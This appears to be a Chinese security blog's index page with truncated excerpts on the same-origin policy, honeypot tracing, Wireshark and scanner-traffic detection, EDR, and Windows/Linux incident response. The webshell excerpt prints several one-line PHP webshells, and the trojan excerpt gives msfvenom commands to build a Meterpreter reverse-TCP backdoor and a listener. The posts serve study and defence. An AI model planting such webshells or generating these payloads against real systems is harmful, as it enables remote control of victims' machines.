w0dao's Blog

一、同源策略 同源策略简而言之就是 ​ 协议、域名、端口都相同 同源策略是由Netscape提出的一个著名的安全策略，现在所有支持JavaScript的浏览器都会使用这个策略，同源策略用于限制从同一个源加载的文档或脚本如何与来自另一个源的资源进行交互。不同源的客户端脚本在没有明确授权的情况下，不能读写对方资源。（DOM、Cookie、三方插件以及XML HttpRequest），其中带src属性的标签不受同源策略的限制 这些标签不受同源策略影响 , 场景1： 百度网盘能从百度中获取到登录信息 CSDN不能从百度中获取到登录信息 场景2： 同源策略测试： req = new XMLHttpRequest() req.open("GET","https://www.baidu.com") req.send() 如果www.baidu.com存在跨域缺陷，同源策略就会杯打破。 二、蜜罐溯源 web蜜罐收集个人信息使用技术主要有两种，分别是JSONP跨域劫持和XSS。在学习jsonp之前，需要了解浏览器的同源策略 蜜罐 ...

一、wireshark基础 Wireshark（前称Ethereal）是一个网络封包分析软件。网络封包分析软件的功能是截取网络封包，并尽可能显示出最为详细的网络封包资料。Wireshark使用WinPCAP作为接口，直接与网卡进行数据报文交换。 在过去，网络封包分析软件是非常昂贵的，或是专门属于盈利用的软件。Ethereal的出现改变了这一切。在GNUGPL通用许可证的保障范围底下，使用者可以以免费的途径取得软件与其源代码，并拥有针对其源代码修改及客制化的权利。Ethereal是全世界最广泛的网络封包分析软件之一。 wireshark和burpsuite的区别 burpsuite：抓取http/https/ws协议，可以修改包，用作中间人攻击 wireshark：抓取TCP/IP模型所有协议，不能修改包，用作流量分析 基本结构 二、Wireshark使用2.1、捕获过滤器 捕获过滤器的类型Type（host、net、port） 方向Dir（src、dst） 协议Proto(ether、ip、tcp、udp、http、icmp、ftp等) 逻辑运算 ...

一、网站流量分析 重点：请求参数、UA 1.1、dirsearch通过查看ua头请求的参数 dirsearch的ua头中浏览器内核版本是86，现在版本已经是122 请求参数过于离谱，一般正常访问不会访问这些网页 1.2、sqlmap流量特征 请z求参数，sql语句比较明显，手写一般写不出来 UA头中，有sqlmap的官方网站 进一步确认 http contains "" 二、漏扫流量分析2.1、AWVS 参数 、ua、content_type中含有test、testing、wvs、acunetix_wvs_security_test 、acuntix、acuntix_wvs http.request.uri.query.parameter contains"test" http.content_type contains "test" http.request.uri.query.parameter contains"test" 2.2、Nmap 过滤显示器中，输入tcp协议 ...

一、Webshell简介1.1、什么是webshell网站的后门，可以通过webshell控制网站 1.2、webshell连接测试<?php @eval($_POST['1']);?> 连接后执行系统命令 也可以使用webshel连接工具。 二、PHP Webshell2.1、常见的php webshell eval型 <?php @eval($_POST['1']);?> 其他代码执行函数型 <?php @assert($_POST['a']);?><?php @assert($_POST['a']);?><?php $st=@create_function('',$_POST['a']);$st();?><?php @preg_replace('/.*/e',$_POST['a'],'');?><?php @pre ...

一、常见的病毒分类1.1、远控木马远程控制木马被红队广泛使用，一般是用metasploit、cobaltstrike等控制器生成的系统可执行文件，如exe，elf,apk,macho文件。一般通过两种方式传播 文件上传漏洞+ 命令执行（主动） 文件下载钓鱼+诱导执行（钓鱼） 系统执行木马文件后，会反连至黑客服务器，黑客即可控制受害者计算机或移动设备，如开启摄像头、屏幕截图、文件管理、软件安装等操作。 用kali中自带的C2软件metasploit生成远控木马文件，并让windows server 2016虚拟机执行远控木马文件 在kali中操作 1. 生成exe后门 msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=这里替换成kali的eth0网卡IP地址 lport=9999 -f exe -o test.exe2. 开启监听msfconsole handler -p windows/x64/meterpreter/reverse_tcp -H 这里替换成kali的eth0网卡IP地址 -P 9999 在kal ...

一、EDR1.1、什么是EDREDR（Endpoint Detection and Response,端点检测和响应），用来指代一种端点安全防护解决方案，它记录端点上的行为，使用数据分析和基于上下文的信息检测来发现异常和恶意活动，并记录有关恶意活动的数据，使安全团队能够调查和响应事件。端点可以是员工终端PC或笔记本电脑，服务器、云系统、移动设备或互联网设备等，EDR解决方案通常提供威胁搜寻、检测、分析和响应功能。 1.2、ERR和XDR、MDR的区别 XDR(Extended Detection and Response，扩展检测和响应)是一种仍在兴起但发展迅速的技术，是一种断点威胁检测和响应的新方法。EDR关注的是端点的数据。而XDR中的“X”代表扩展，它代表任何数据源。不仅是端点还有网络，电子邮件，应用程序，云工作负载等。 MDR（托管检测和响应服务）。MDR可被理解为托管的XDR 1.3、EDR的功能 持续收集端点数据 实时分析和威胁检测 自动威胁响应 溯源深度处置 支持威胁搜寻和安全加固 1.4、openedr官网地址：https://www.openedr.com/ ...

一、windows日志 如果windows服务被入侵，往往需要检索和分析相应的安全日志 除了安全设备，系统自带的日志就是取证的关键材料，但是日志数量庞大，需要高效分析windows安全日志 1.1、windows事件日志 Windows事件日志文件实际上是以特定的数据结构的方式存储内容，其中包括有关系统，安全，应用程序的记录 每个记录事件的数据结构中包含了9个元素（可以理解成数据库中的字段）： 日期/时间 事件类型 用户 计算机 事件ID 来源 类别 描述 数据等信息 查看日志的方法：Win+R，输入 eventvwr.msc 打开事件查看器 eventvwr.msc 1.2、事件查看器 事件查看器将日志分为两大类，windows日志、应用程序日志和服务日志 windows日志中又有应用程序、安全、setup、系统和forworded event这几种事件类型 1.2.1、应用程序日志 包含由应用程序或系统程序记录的事件，主要记录程序运行方面的事件 例如数据库程序可以在应用程序日志中记录文件错误，程序开发人员可以自行决定监视哪些事件 如果某个应用程序出现崩溃情 ...

一、日志介绍 此文章不考虑日志被删除的情况 删除日志需要管理员权限，且删除日志本身也会留下日志 删除日志的操作会被日志记录设备告警 删除只能删除在受害机器上的日志，日志设备中的日志不会受影响 1.1、为什么要使用日志 可以在故障刚刚发生的时就向用户发送警告信息 可以用来决定故障的根本原因或缩小系统攻击范围 1.2、分析日志的意义 如今各式各样的漏洞层出不穷，五花八门的入侵工具更是令人眼花缭乱，稍微懂点网络知识的人都可以利用各种入侵工具进行入侵 虽然经过精心配置的服务器可以抵御大部分入侵，但伴随着新漏洞的出现，也不能保证一台服务器长时间不会被入侵，所以如何检测入侵者行动以保证服务器安全性就会显得十分重要 通过日志，可以分析出各种网络可疑行为、违规操作、敏感信息，协助定位安全事件源头和调查取证，防范和发现计算机网络犯罪活动 1.3、常见的中间件漏洞 apache tomcat IIS Weblogic JBoss Nginx 1.4、中间件日志的关键点 对访问时间进行统计，可以得到服务器在某些时间段的访问情况 对IP进行统计，可以得到用户的分布情况 对请求URL的统计，可以 ...

一、排查思路与排查流程1.1、常见应急响应事件分类 web入侵：网页挂马、主页篡改、Webshell 系统入侵：病毒木马、勒索软件、远控后门 网络攻击：DDOS攻击、DNS劫持、ARP欺骗 1.2、排查流程 二、账号安全2.1、正常用户与黑客账号的区别 正常用户 net user 能直接看到 net user 隐藏用户是以$结尾，net user 看不到，但是在控制面板、lusrmgr.msc、用户组中能看到 lusrmgr.msc 影子用户只有注册表中能看到 2.2、windows自带账户 Administratros（管理员）：这是具有完全控制和访问权限的管理员账户。默认处于禁用状态 DefaultAccount（默认账户）：这是Windows 10中的一个预配 置账户，用于应用程序容器和系统组件的身份验证。它主要用于提供安全性和隔离性。 Guest（访客）：该账户提供了一个受限制的用户环境，允许临时用户使用计算机但不能进行敏感操作或更改系统设置。通常情况下，默认情况下此账户处于禁用状态。 WDAGUtilityAccount：这是Windows Defend ...

一、入侵排查思路1.1、账户安全用户信息文件 /etc/passwd cat /etc/passwd 解释： account:password:UID:GID:GECOS:directory:shell 用户名：密码（x代表占位符，表示该密码在/etc/shadow中）：用户ID：组：ID：用户说明：家目录：登录之后的shell root:x:0:0:root:/root:/usr/bin/zsh 用户名root，x表示密码存在，0表示用户ID，0表示组ID，root用来描述用户，/root表示用户的家目录，/usr/bin/zsh表示登录后shell的位置 /etc/passwd 是任何人都能够查看的，但是只有root用户可以更改 /usr/sbin/nologin 代表用户是无法通过远程登录界面以及ssh远程登录，也无法通过su命令进行用户切换，简而言之就是不能登录使用，使用来其他服务其他程序。 ...